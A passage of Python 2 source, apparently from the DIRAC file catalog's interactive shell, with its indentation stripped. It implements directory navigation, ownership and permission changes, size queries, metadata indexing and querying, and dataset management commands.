if (len(argss)==0):
print self.do_group.__doc__
return
path = argss[0]
if path.find('/') == 0:
newdir = path
else:
newdir = self.cwd + '/' + path
newdir = newdir.replace(r'//','/')
result = self.fc.createDirectory(newdir)
if result['OK']:
if result['Value']['Successful']:
if result['Value']['Successful'].has_key(newdir):
print "Successfully created directory:", newdir
elif result['Value']['Failed']:
if result['Value']['Failed'].has_key(newdir):
print 'Failed to create directory:',result['Value']['Failed'][newdir]
else:
print 'Failed to create directory:',result['Message']
def complete_mkdir(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_cd(self,args):
""" Change directory to <path>
usage: cd <path>
cd -
"""
argss = args.split()
if len(argss) == 0:
path = '/'
else:
path = argss[0]
if path == '-':
path = self.previous_cwd
newcwd = self.getPath(path)
if len(newcwd)>1 and not newcwd.find('..') == 0 :
newcwd=newcwd.rstrip("/")
result = self.fc.isDirectory(newcwd)
if result['OK']:
if result['Value']['Successful']:
if result['Value']['Successful'][newcwd]:
#if result['Type'] == "Directory":
self.previous_cwd = self.cwd
self.cwd = newcwd
self.prompt = 'FC:'+self.cwd+'>'
else:
print newcwd,'does not exist or is not a directory'
else:
print newcwd,'is not found'
else:
print 'Server failed to find the directory',newcwd
def complete_cd(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_id(self,args):
""" Get user identity
"""
result = getProxyInfo()
if not result['OK']:
print "Error: %s" % result['Message']
return
user = result['Value']['username']
group = result['Value']['group']
result = self.fc.getUsers()
if not result['OK']:
print "Error: %s" % result['Message']
return
userDict = result['Value']
result = self.fc.getGroups()
if not result['OK']:
print "Error: %s" % result['Message']
return
groupDict = result['Value']
idUser = userDict.get(user,0)
idGroup = groupDict.get(group,0)
print "user=%d(%s) group=%d(%s)" % (idUser,user,idGroup,group)
def do_lcd(self,args):
""" Change local directory
usage:
lcd <local_directory>
"""
argss = args.split()
if (len(argss) != 1):
print self.do_lcd.__doc__
return
localDir = argss[0]
try:
os.chdir(localDir)
newDir = os.getcwd()
print "Local directory: %s" % newDir
except:
print "%s seems not a directory" % localDir
def complete_lcd(self, text, line, begidx, endidx):
# TODO
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.ul_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_pwd(self,args):
""" Print out the current directory
usage: pwd
"""
print self.cwd
def do_ls(self,args):
""" Lists directory entries at <path>
usage: ls [-ltrn] <path>
"""
argss = args.split()
# Get switches
_long = False
reverse = False
timeorder = False
numericid = False
path = self.cwd
if len(argss) > 0:
if argss[0][0] == '-':
if 'l' in argss[0]:
_long = True
if 'r' in argss[0]:
reverse = True
if 't' in argss[0]:
timeorder = True
if 'n' in argss[0]:
numericid = True
del argss[0]
# Get path
if argss:
path = argss[0]
if path[0] != '/':
path = self.cwd+'/'+path
path = path.replace(r'//','/')
# remove last character if it is "/"
if path[-1] == '/' and path != '/':
path = path[:-1]
# Check if the target path is a file
result = self.fc.isFile(path)
if not result['OK']:
print "Error: can not verify path"
return
elif path in result['Value']['Successful'] and result['Value']['Successful'][path]:
result = self.fc.getFileMetadata(path)
dList = DirectoryListing()
fileDict = result['Value']['Successful'][path]
dList.addFile(os.path.basename(path),fileDict,{},numericid)
dList.printListing(reverse,timeorder)
return
# Get directory contents now
try:
result = self.fc.listDirectory(path,_long)
dList = DirectoryListing()
if result['OK']:
if result['Value']['Successful']:
for entry in result['Value']['Successful'][path]['Files']:
fname = entry.split('/')[-1]
# print entry, fname
# fname = entry.replace(self.cwd,'').replace('/','')
if _long:
fileDict = result['Value']['Successful'][path]['Files'][entry]['MetaData']
repDict = result['Value']['Successful'][path]['Files'][entry].get( "Replicas", {} )
if fileDict:
dList.addFile(fname,fileDict,repDict,numericid)
else:
dList.addSimpleFile(fname)
for entry in result['Value']['Successful'][path]['SubDirs']:
dname = entry.split('/')[-1]
# print entry, dname
# dname = entry.replace(self.cwd,'').replace('/','')
if _long:
dirDict = result['Value']['Successful'][path]['SubDirs'][entry]
if dirDict:
dList.addDirectory(dname,dirDict,numericid)
else:
dList.addSimpleFile(dname)
for entry in result['Value']['Successful'][path]['Links']:
pass
if 'Datasets' in result['Value']['Successful'][path]:
for entry in result['Value']['Successful'][path]['Datasets']:
dname = os.path.basename( entry )
if _long:
dsDict = result['Value']['Successful'][path]['Datasets'][entry]['Metadata']
if dsDict:
dList.addDataset(dname,dsDict,numericid)
else:
dList.addSimpleFile(dname)
if _long:
dList.printListing(reverse,timeorder)
else:
dList.printOrdered()
else:
print "Error:",result['Message']
except Exception, x:
print "Error:", str(x)
def complete_ls(self, text, line, begidx, endidx):
result = []
args = line.split()
index_cnt = 0
if (len(args) > 1):
if ( args[1][0] == "-"):
index_cnt = 1
# the first argument -- LFN.
if (1+index_cnt<=len(args)<=2+index_cnt):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_cnt) or (len(args)==2+index_cnt and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_cnt):
cur_path = args[1+index_cnt]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chown(self,args):
""" Change owner of the given path
usage: chown [-R] <owner> <path>
"""
argss = args.split()
recursive = False
if (len(argss) == 0):
print self.do_chown.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
if (len(argss) != 2):
print self.do_chown.__doc__
return
owner = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
pathDict[lfn] = owner
try:
result = self.fc.changePathOwner( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chown(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chgrp(self,args):
""" Change group of the given path
usage: chgrp [-R] <group> <path>
"""
argss = args.split()
recursive = False
if (len(argss) == 0):
print self.do_chgrp.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
if (len(argss) != 2):
print self.do_chgrp.__doc__
return
group = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
pathDict[lfn] = group
try:
result = self.fc.changePathGroup( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chgrp(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chmod(self,args):
""" Change permissions of the given path
usage: chmod [-R] <mode> <path>
"""
argss = args.split()
recursive = False
if (len(argss) < 2):
print self.do_chmod.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
mode = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
# treat mode as octal
pathDict[lfn] = eval('0'+mode)
try:
result = self.fc.changePathMode( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chmod(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_size(self,args):
""" Get file or directory size. If -l switch is specified, get also the total
size per Storage Element
usage: size [-l] [-f] <lfn>|<dir_path>
Switches:
-l long output including per SE report
-f use raw file information and not the storage tables
"""
argss = args.split()
_long = False
fromFiles = False
if len(argss) > 0:
if argss[0] == '-l':
_long = True
del argss[0]
if len(argss) > 0:
if argss[0] == '-f':
fromFiles = True
del argss[0]
if len(argss) == 1:
path = argss[0]
if path == '.':
path = self.cwd
else:
path = self.cwd
path = self.getPath(path)
try:
result = self.fc.isFile(path)
if not result['OK']:
print "Error:",result['Message']
if result['Value']['Successful']:
if result['Value']['Successful'][path]:
print "lfn:",path
result = self.fc.getFileSize(path)
if result['OK']:
if result['Value']['Successful']:
print "Size:",result['Value']['Successful'][path]
else:
print "File size failed:", result['Value']['Failed'][path]
else:
print "File size failed:",result['Message']
else:
print "directory:",path
result = self.fc.getDirectorySize( path, _long, fromFiles )
if result['OK']:
if result['Value']['Successful']:
print "Logical Size:",int_with_commas(result['Value']['Successful'][path]['LogicalSize']), \
"Files:",result['Value']['Successful'][path]['LogicalFiles'], \
"Directories:",result['Value']['Successful'][path]['LogicalDirectories']
if _long:
fields = ['StorageElement','Size','Replicas']
values = []
if "PhysicalSize" in result['Value']['Successful'][path]:
print
totalSize = result['Value']['Successful'][path]['PhysicalSize']['TotalSize']
totalFiles = result['Value']['Successful'][path]['PhysicalSize']['TotalFiles']
for se,sdata in result['Value']['Successful'][path]['PhysicalSize'].items():
if not se.startswith("Total"):
size = sdata['Size']
nfiles = sdata['Files']
#print se.rjust(20),':',int_with_commas(size).ljust(25),"Files:",nfiles
values.append( (se, int_with_commas(size), str(nfiles)) )
#print '='*60
#print 'Total'.rjust(20),':',int_with_commas(totalSize).ljust(25),"Files:",totalFiles
values.append( ('Total', int_with_commas(totalSize), str(totalFiles)) )
printTable(fields,values)
if "QueryTime" in result['Value']:
print "Query time %.2f sec" % result['Value']['QueryTime']
else:
print "Directory size failed:", result['Value']['Failed'][path]
else:
print "Directory size failed:",result['Message']
else:
print "Failed to determine path type"
except Exception, x:
print "Size failed: ", x
def complete_size(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0
if '-l' in args:
index_counter = 1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_guid(self,args):
""" Get the file GUID
usage: guid <lfn>
"""
argss = args.split()
if (len(argss) == 0):
print self.do_guid.__doc__
return
path = argss[0]
try:
result = self.fc.getFileMetadata(path)
if result['OK']:
if result['Value']['Successful']:
print "GUID:",result['Value']['Successful'][path]['GUID']
else:
print "ERROR: getting guid failed"
else:
print "ERROR:",result['Message']
except Exception, x:
print "guid failed: ", x
def complete_guid(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
##################################################################################
# Metadata methods
def do_meta(self,args):
""" Metadata related operations
Usage:
meta index [-d|-f|-r] <metaname> [<metatype>] - add new metadata index. Possible types are:
'int', 'float', 'string', 'date';
-d directory metadata
-f file metadata
-r remove the specified metadata index
meta set <path> <metaname> <metavalue> - set metadata value for directory or file
meta remove <path> <metaname> - remove metadata value for directory or file
meta get [-e] [<path>] - get metadata for the given directory or file
meta tags <path> <metaname> where <meta_selection> - get values (tags) of the given metaname compatible with
the metadata selection
meta show - show all defined metadata indice
"""
argss = args.split()
if (len(argss)==0):
print self.do_meta.__doc__
return
option = argss[0]
del argss[0]
if option == 'set':
if (len(argss) != 3):
print self.do_meta.__doc__
return
return self.setMeta(argss)
elif option == 'get':
return self.getMeta(argss)
elif option[:3] == 'tag':
# TODO
if (len(argss) == 0):
print self.do_meta.__doc__
return
return self.metaTag(argss)
elif option == 'index':
if (len(argss) < 1):
print self.do_meta.__doc__
return
return self.registerMeta(argss)
elif option == 'metaset':
# TODO
if (len(argss) == 0):
print self.do_meta.__doc__
return
return self.registerMetaset(argss)
elif option == 'show':
return self.showMeta()
elif option == 'remove' or option == "rm":
if (len(argss) != 2):
print self.do_meta.__doc__
return
return self.removeMeta(argss)
else:
print "Unknown option:",option
# auto completion for ``meta``
# TODO: what's the doc for metaset?
_available_meta_cmd = ["set", "get", "tag", "tags",
"index", "metaset","show",
"rm", "remove"]
_meta_cmd_need_lfn = ["set", "get",
"rm", "remove"]
def complete_meta(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_meta_cmd):
# if the sub command is not in self._meta_cmd_need_lfn
# Don't need any auto completion
if (args[1] in self._meta_cmd_need_lfn):
# TODO
if (len(args) == 2):
cur_path = ""
elif ( len(args) > 2 ):
# If the line ends with ' '
# this means a new parameter begin.
if line.endswith(' '):
cur_path = ""
else:
cur_path = args[-1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
pass
return result
result = [i for i in self._available_meta_cmd if i.startswith(text)]
return result
def removeMeta(self,argss):
""" Remove the specified metadata for a directory or file
"""
apath = argss[0]
path = self.getPath(apath)
if len(argss) < 2:
print "Error: no metadata is specified for removal"
return
metadata = argss[1:]
result = self.fc.removeMetadata(path,metadata)
if not result['OK']:
print "Error:", result['Message']
if "FailedMetadata" in result:
for meta,error in result['FailedMetadata']:
print meta,';',error
def setMeta(self,argss):
""" Set metadata value for a directory
"""
if len(argss) != 3:
print "Error: command requires 3 arguments, %d given" % len(argss)
return
path = argss[0]
if path == '.':
path = self.cwd
elif path[0] != '/':
path = self.cwd+'/'+path
meta = argss[1]
value = argss[2]
print path,meta,value
metadict = {}
metadict[meta]=value
result = self.fc.setMetadata(path,metadict)
if not result['OK']:
print ("Error: %s" % result['Message'])
def getMeta(self,argss):
""" Get metadata for the given directory
"""
expandFlag = False
dirFlag = True
if len(argss) == 0:
path ='.'
else:
if argss[0] == "-e":
expandFlag = True
del argss[0]
if len(argss) == 0:
path ='.'
else:
path = argss[0]
dirFlag = False
if path == '.':
path = self.cwd
elif path[0] != '/':
path = self.getPath(path)
path = path.rstrip( '/' )
if not dirFlag:
# Have to decide if it is a file or not
result = self.fc.isFile(path)
if not result['OK']:
print "ERROR: Failed to contact the catalog"
if not result['Value']['Successful']:
print "ERROR: Path not found"
dirFlag = not result['Value']['Successful'][path]
if dirFlag:
result = self.fc.getDirectoryMetadata(path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
metaDict = result['MetadataOwner']
metaTypeDict = result['MetadataType']
for meta, value in result['Value'].items():
setFlag = metaDict[meta] != 'OwnParameter' and metaTypeDict[meta] == "MetaSet"
prefix = ''
if setFlag:
prefix = "+"
if metaDict[meta] == 'ParentMetadata':
prefix += "*"
print (prefix+meta).rjust(20),':',value
elif metaDict[meta] == 'OwnMetadata':
prefix += "!"
print (prefix+meta).rjust(20),':',value
else:
print meta.rjust(20),':',value
if setFlag and expandFlag:
result = self.fc.getMetadataSet(value,expandFlag)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
for m,v in result['Value'].items():
print " "*10,m.rjust(20),':',v
else:
print "No metadata defined for directory"
else:
result = self.fc.getFileUserMetadata(path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
for meta,value in result['Value'].items():
print meta.rjust(20),':', value
else:
print "No metadata found"
def metaTag(self,argss):
""" Get values of a given metadata tag compatible with the given selection
"""
path = argss[0]
del argss[0]
tag = argss[0]
del argss[0]
path = self.getPath(path)
# Evaluate the selection dictionary
metaDict = {}
if argss:
if argss[0].lower() == 'where':
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if not result['Value']:
print "Error: no metadata fields defined"
return
typeDictfm = result['Value']['FileMetaFields']
typeDict = result['Value']['DirectoryMetaFields']
del argss[0]
for arg in argss:
try:
name,value = arg.split('=')
if not name in typeDict:
if not name in typeDictfm:
print "Error: metadata field %s not defined" % name
else:
print 'No support for meta data at File level yet: %s' % name
return
mtype = typeDict[name]
mvalue = value
if mtype[0:3].lower() == 'int':
mvalue = int(value)
if mtype[0:5].lower() == 'float':
mvalue = float(value)
metaDict[name] = mvalue
except Exception,x:
print "Error:",str(x)
return
else:
print "Error: WHERE keyword is not found after the metadata tag name"
return
result = self.fc.getCompatibleMetadata( metaDict, path )
if not result['OK']:
print ("Error: %s" % result['Message'])
return
tagDict = result['Value']
if tag in tagDict:
if tagDict[tag]:
print "Possible values for %s:" % tag
for v in tagDict[tag]:
print v
else:
print "No compatible values found for %s" % tag
def showMeta(self):
""" Show defined metadata indices
"""
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "Metadata for file or directory found"
else:
if len(result['Value']['FileMetaFields']):
print "\n","File metadata".rjust(20,":")
for meta, metatype in result['Value']['FileMetaFields'].items():
metatype = metatype.replace("int","integer").replace("INT","integer").replace("VARCHAR(128)","string")
print meta.rjust(20),':',metatype
if len(result['Value']['DirectoryMetaFields']):
print "\n","Directory metadata".rjust(20),":"
for meta,metatype in result['Value']['DirectoryMetaFields'].items():
metatype = metatype.replace("int","integer").replace("INT","integer").replace("VARCHAR(128)","string")
print meta.rjust(20),':',metatype
result = self.fc.listMetadataSets()
if not result['OK']:
print 'Error: %s' % result['Message']
else:
if not result['Value']:
print "No Metadata sets defined"
else:
print "\n","Metadata sets".rjust(20),":"
for metasetname, values in result['Value'].items():
metastr = ''
for key,val in values.items():
metastr += "%s : %s, " % (key, val)
metastr.rstrip(",")
print "%s -> %s" % (metasetname.rjust(20), metastr)
def registerMeta(self,argss):
""" Add metadata field.
"""
if len(argss) < 2:
print "Unsufficient number of arguments"
return
fdType = '-d'
removeFlag = False
if argss[0].lower() in ['-d','-f']:
fdType = argss[0]
del argss[0]
if argss[0].lower() == '-r':
removeFlag = True
del argss[0]
if len(argss) < 2 and not removeFlag:
print "Unsufficient number of arguments"
return
mname = argss[0]
if removeFlag:
result = self.fc.deleteMetadataField(mname)
if not result['OK']:
print "Error:", result['Message']
return
mtype = argss[1]
if mtype.lower()[:3] == 'int':
rtype = 'INT'
elif mtype.lower()[:7] == 'varchar':
rtype = mtype
elif mtype.lower() == 'string':
rtype = 'VARCHAR(128)'
elif mtype.lower() == 'float':
rtype = 'FLOAT'
elif mtype.lower() == 'date':
rtype = 'DATETIME'
elif mtype.lower() == 'metaset':
rtype = 'MetaSet'
else:
print "Error: illegal metadata type %s" % mtype
return
result = self.fc.addMetadataField(mname,rtype,fdType)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Added metadata field %s of type %s" % (mname,mtype)
def registerMetaset(self,argss):
""" Add metadata set
"""
setDict = {}
setName = argss[0]
del argss[0]
for arg in argss:
key,value = arg.split('=')
setDict[key] = value
result = self.fc.addMetadataSet(setName,setDict)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Added metadata set %s" % setName
def do_find(self,args):
""" Find all files satisfying the given metadata information
usage: find [-q] [-D] <path> <meta_name>=<meta_value> [<meta_name>=<meta_value>]
"""
argss = args.split()
if (len(argss) < 1):
print self.do_find.__doc__
return
verbose = True
if argss[0] == "-q":
verbose = False
del argss[0]
dirsOnly = False
if argss[0] == "-D":
dirsOnly = True
del argss[0]
path = argss[0]
path = self.getPath(path)
del argss[0]
if argss:
if argss[0][0] == '{':
metaDict = eval(argss[0])
else:
metaDict = self.__createQuery(' '.join(argss))
else:
metaDict = {}
if verbose:
print "Query:",metaDict
result = self.fc.findFilesByMetadata(metaDict,path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
listToPrint = None
if dirsOnly:
listToPrint = set( "/".join(fullpath.split("/")[:-1]) for fullpath in result['Value'] )
else:
listToPrint = result['Value']
for dir_ in listToPrint:
print dir_
else:
if verbose:
print "No matching data found"
if verbose and "QueryTime" in result:
print "QueryTime %.2f sec" % result['QueryTime']
def complete_find(self, text, line, begidx, endidx):
result = []
args = line.split()
# skip "-q" optional switch
if len(args) >= 2 and args[1] == "-q":
if len(args) > 2 or line.endswith(" "):
del args[1]
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def __createQuery(self,args):
""" Create the metadata query out of the command line arguments
"""
argss = args.split()
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
return None
if not result['Value']:
print "Error: no metadata fields defined"
return None
typeDict = result['Value']['FileMetaFields']
typeDict.update(result['Value']['DirectoryMetaFields'])
# Special meta tags
typeDict['SE'] = 'VARCHAR'
typeDict['User'] = 'VARCHAR'
typeDict['Group'] = 'VARCHAR'
typeDict['Path'] = 'VARCHAR'
metaDict = {}
contMode = False
for arg in argss:
if not contMode:
operation = ''
for op in ['>=','<=','>','<','!=','=']:
if arg.find(op) != -1:
operation = op
break
if not operation:
print "Error: operation is not found in the query"
return None
name,value = arg.split(operation)
if not name in typeDict:
print "Error: metadata field %s not defined" % name
return None
mtype = typeDict[name]
else:
value += ' ' + arg
value = value.replace(contMode,'')
contMode = False
if value[0] in ['"', "'"] and value[-1] not in ['"', "'"]:
contMode = value[0]
continue
if value.find(',') != -1:
valueList = [ x.replace("'","").replace('"','') for x in value.split(',') ]
mvalue = valueList
if mtype[0:3].lower() == 'int':
mvalue = [ int(x) for x in valueList if not x in ['Missing','Any'] ]
mvalue += [ x for x in valueList if x in ['Missing','Any'] ]
if mtype[0:5].lower() == 'float':
mvalue = [ float(x) for x in valueList if not x in ['Missing','Any'] ]
mvalue += [ x for x in valueList if x in ['Missing','Any'] ]
if operation == "=":
operation = 'in'
if operation == "!=":
operation = 'nin'
mvalue = {operation:mvalue}
else:
mvalue = value.replace("'","").replace('"','')
if not value in ['Missing','Any']:
if mtype[0:3].lower() == 'int':
mvalue = int(value)
if mtype[0:5].lower() == 'float':
mvalue = float(value)
if operation != '=':
mvalue = {operation:mvalue}
if name in metaDict:
if type(metaDict[name]) == DictType:
if type(mvalue) == DictType:
op,value = mvalue.items()[0]
if op in metaDict[name]:
if type(metaDict[name][op]) == ListType:
if type(value) == ListType:
metaDict[name][op] = uniqueElements(metaDict[name][op] + value)
else:
metaDict[name][op] = uniqueElements(metaDict[name][op].append(value))
else:
if type(value) == ListType:
metaDict[name][op] = uniqueElements([metaDict[name][op]] + value)
else:
metaDict[name][op] = uniqueElements([metaDict[name][op],value])
else:
metaDict[name].update(mvalue)
else:
if type(mvalue) == ListType:
metaDict[name].update({'in':mvalue})
else:
metaDict[name].update({'=':mvalue})
elif type(metaDict[name]) == ListType:
if type(mvalue) == DictType:
metaDict[name] = {'in':metaDict[name]}
metaDict[name].update(mvalue)
elif type(mvalue) == ListType:
metaDict[name] = uniqueElements(metaDict[name] + mvalue)
else:
metaDict[name] = uniqueElements(metaDict[name].append(mvalue))
else:
if type(mvalue) == DictType:
metaDict[name] = {'=':metaDict[name]}
metaDict[name].update(mvalue)
elif type(mvalue) == ListType:
metaDict[name] = uniqueElements([metaDict[name]] + mvalue)
else:
metaDict[name] = uniqueElements([metaDict[name],mvalue])
else:
metaDict[name] = mvalue
return metaDict
def do_dataset( self, args ):
""" A set of dataset manipulation commands
Usage:
dataset add <dataset_name> <meta_query> - add a new dataset definition
dataset annotate <dataset_name> <annotation> - add annotation to a dataset
dataset show [-l] [<dataset_name>] - show existing datasets
dataset status <dataset_name> - display the dataset status
dataset files <dataset_name> - show dataset files
dataset rm <dataset_name> - remove dataset
dataset check <dataset_name> - check if the dataset parameters are still valid
dataset update <dataset_name> - update the dataset parameters
dataset freeze <dataset_name> - fix the current contents of the dataset
dataset release <dataset_name> - release the dynamic dataset
"""
argss = args.split()
if (len(argss)==0):
print self.do_meta.__doc__
return
command = argss[0]
del argss[0]
if command == "add":
self.dataset_add( argss )
elif command == "annotate":
self.dataset_annotate( argss )
elif command == "show":
self.dataset_show( argss )
elif command == "files":
self.dataset_files( argss )
elif command == "rm":
self.dataset_rm( argss )
elif command == "check":
self.dataset_check( argss )
elif command == "update":
self.dataset_update( argss )
elif command == "freeze":
self.dataset_freeze( argss )
elif command == "release":
self.dataset_release( argss )
elif command == "status":
self.dataset_status( argss )
def dataset_add( self, argss ):
""" Add a new dataset
"""
datasetName = argss[0]
metaSelections = ' '.join( argss[1:] )
metaDict = self.__createQuery( metaSelections )
datasetName = self.getPath( datasetName )
result = self.fc.addDataset( datasetName, metaDict )
if not result['OK']:
print "ERROR: failed to add dataset:", result['Message']
else:
print "Successfully added dataset", datasetName
def dataset_annotate( self, argss ):
""" Add a new dataset
"""
datasetName = argss[0]
annotation = ' '.join( argss[1:] )
datasetName = self.getPath( datasetName )
result = self.fc.addDatasetAnnotation( {datasetName: annotation} )
if not result['OK']:
print "ERROR: failed to add annotation:", result['Message']
else:
print "Successfully added annotation to", datasetName
def dataset_status( self, argss ):
""" Display the dataset status
"""
datasetName = argss[0]
result = self.fc.getDatasetParameters( datasetName )
if not result['OK']:
print "ERROR: failed to get status of dataset:", result['Message']
else:
parDict = result['Value']
for par,value in parDict.items():
print par.rjust(20),':',value
def dataset_rm( self, argss ):
""" Remove the given dataset
"""
datasetName = argss[0]
result = self.fc.removeDataset( datasetName )
if not result['OK']:
print "ERROR: failed to remove dataset:", result['Message']
else:
print "Successfully removed dataset", datasetName
def dataset_check( self, argss ):
""" check if the dataset parameters are still valid
"""
datasetName = argss[0]
result = self.fc.checkDataset( datasetName )
if not result['OK']:
print "ERROR: failed to check dataset:", result['Message']
else:
changeDict = result['Value']
if not changeDict:
print "Dataset is not changed"
else:
print "Dataset changed:"
for par in changeDict:
print " ",par,': ',changeDict[par][0],'->',changeDict[par][1]
def dataset_update( self, argss ):
""" Update the given dataset parameters
"""
datasetName = argss[0]
result = self.fc.updateDataset( datasetName )
if not result['OK']:
print "ERROR: failed to update dataset:", result['Message']
else:
print "Successfully updated dataset", datasetName
def dataset_freeze( self, argss ):
""" Freeze the given dataset
"""
datasetName = argss[0]
result = self.fc.freezeDataset( datasetName )
if not result['OK']:
print "ERROR: failed to freeze dataset:", result['Message']
else:
print "Successfully frozen dataset", datasetName
def dataset_release( self, argss ):
""" Release the given dataset
"""
datasetName = argss[0]
result = self.fc.releaseDataset( datasetName )
if not result['OK']:
print "ERROR: failed to release dataset:", result['Message']
else:
print "Successfully released dataset", datasetName
def dataset_files( self, argss ):
""" Get the given dataset files
"""
datasetName = argss[0]
result = self.fc.getDatasetFiles( datasetName )
if not result['OK']:
print "ERROR: failed to get files for dataset:", result['Message']
else:
lfnList = result['Value']
for lfn in lfnList:
print lfn
def dataset_show( self, argss ):
""" Show existing requested datasets
"""
long_ = False
if '-l' in argss:
long_ = True
del argss[argss.index('-l')]
datasetName = ''
if len( argss ) > 0:
datasetName = argss[0]
result = self.fc.getDatasets( datasetName )
if not result['OK']:
print "ERROR: failed to get datasets"
return
datasetDict = result['Value']
if not long_:
for dName in datasetDict.keys():
print dName
else:
fields = ['Key','Value']
datasets = datasetDict.keys()
dsAnnotations = {}
resultAnno = self.fc.getDatasetAnnotation( datasets )
if resultAnno['OK']:
dsAnnotations = resultAnno['Value']['Successful']
for dName in datasets:
records = []
print '\n'+dName+":"
print '='*(len(dName)+1)
for key,value in datasetDict[dName].items():
records.append( [key,str( value )] )
if dName in dsAnnotations:
records.append( [ 'Annotation',dsAnnotations[dName] ] )
printTable( fields, records )
def do_stats( self, args ):
""" Get the catalog statistics
Usage:
stats
"""
try:
result = self.fc.getCatalogCounters()
except AttributeError, x:
print "Error: no statistics available for this type of catalog:", str(x)
return
if not result['OK']:
print ("Error: %s" % result['Message'])
return
fields = ['Counter','Number']
records = []
for key,value in result['Value'].items():
records.append( ( key, str(value) ) )
#print key.rjust(15),':',result['Value'][key]
printTable( fields, records )
def do_rebuild( self, args ):
""" Rebuild auxiliary tables
Usage:
rebuild <option>
"""
argss = args.split()
_option = argss[0]
start = time.time()
result = self.fc.rebuildDirectoryUsage()
if not result['OK']:
print "Error:", result['Message']
return
total = time.time() - start
print "Directory storage info rebuilt in %.2f sec", total
def do_repair( self, args ):
""" Repair catalog inconsistencies
Usage:
repair catalog
"""
argss = args.split()
_option = argss[0]
start = time.time()
result = self.fc.repairCatalog()
if not result['OK']:
print "Error:", result['Message']
return
